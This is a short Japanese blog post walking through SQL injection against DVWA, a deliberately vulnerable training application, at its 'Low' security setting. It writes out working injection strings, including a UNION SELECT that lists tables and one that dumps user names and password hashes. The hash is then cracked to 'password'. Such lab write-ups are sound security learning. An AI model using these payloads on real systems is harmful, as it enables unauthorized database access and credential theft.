shikata ga nai

Private? There is no such things.

DVWAでSQLインジェクション(Low)

Hey guys!

セキュリティレベル『Low』で実行。

まずは、ソースコードを確認。

 

f:id:ThisIsOne:20191106092835p:plain

 

『1』と入力して動作を確認。

 

f:id:ThisIsOne:20191106093003p:plain

 

まずは、『1'』だとエラー。

 

f:id:ThisIsOne:20191106093131p:plain

 

『1' or 1=1』でもエラー。

 

f:id:ThisIsOne:20191106093319p:plain

 

『1' or 1=1 #』だとなにか情報が出てきた。

#を追加することで、#以降の文字をコメント処理させてみた。

 

f:id:ThisIsOne:20191106093434p:plain

 

『1' or 1=1 union SELECT null,table_name FROM INFORMATION_SCHEMA.TABLES#』でテーブルを取得。

 

f:id:ThisIsOne:20191106101240p:plain

 

どうやらusersテーブルがあるようなので
『1' or 1=1 union select user,password from users #』でパスワードを表示。

 

f:id:ThisIsOne:20191106095131p:plain

 

パスワードのハッシュ値を複合すると『password』で、ビンゴ!

 

f:id:ThisIsOne:20191106095208p:plain

 

Best regards,

 

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain